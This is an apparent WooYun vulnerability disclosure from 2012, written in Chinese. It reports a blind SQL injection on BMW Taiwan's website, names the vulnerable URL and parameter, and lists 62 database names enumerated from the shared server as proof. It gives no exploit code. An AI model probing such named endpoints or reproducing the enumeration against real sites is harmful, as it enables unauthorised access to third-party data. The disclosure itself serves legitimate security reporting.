当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2012-010611
漏洞标题:
宝马官网SQL盲注可导致用户信息泄漏
相关厂商:
BMW集团
漏洞作者:
小蝎
提交时间:
2012-08-07 11:19
修复时间:
2012-08-07 11:19
公开时间:
2012-08-07 11:19
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
15
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2012-08-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-08-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

BMW集团官网SQL盲注可导致用户信息泄漏。

详细说明:

BMW集团官网SQL盲注可导致用户信息泄漏。

漏洞证明:

其中某个Blind点:http://www.bmw.com.tw/news/content.jsp?id=43

databases [62]:
[*] acnes
[*] bb
[*] bmw
[*] cesarclub
[*] contrex
[*] doublemint
[*] dovechocolate
[*] Eclipse
[*] evaair
[*] Extra
[*] ford
[*] GeorgJensen
[*] godiva
[*] greenlifestyle
[*] Hitachi
[*] hofmini
[*] imprint
[*] ITRI
[*] KuaiKuaiBremen
[*] levis_footwear
[*] lgarena
[*] LHF
[*] lianhwa
[*] lianhwa_official
[*] lianhwatest
[*] master
[*] mentholatum2
[*] Mini
[*] Mini2
[*] miniclubman
[*] model
[*] modshair
[*] modshairC
[*] msdb
[*] myth
[*] MythBusters
[*] MythBusters2
[*] mythchnsim
[*] mytheng
[*] NewHyundai
[*] NewHyundai_bak
[*] Nokia
[*] OlayOfficial
[*] pepsi
[*] realbeauty
[*] Rivon
[*] sakura
[*] se_facebook
[*] share
[*] sitebuilder29860717975830047B0C9EE9F377A155
[*] skincare
[*] SonyEricsson
[*] springday_pet
[*] sujay
[*] sujaytravelpack
[*] tempdb
[*] testmyth
[*] tracer
[*] tracer2
[*] tracer2008
[*] unlbmw
[*] unlbmw_test



修复方案:

你懂得补丁修复。

版权声明:转载请注明来源 小蝎@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝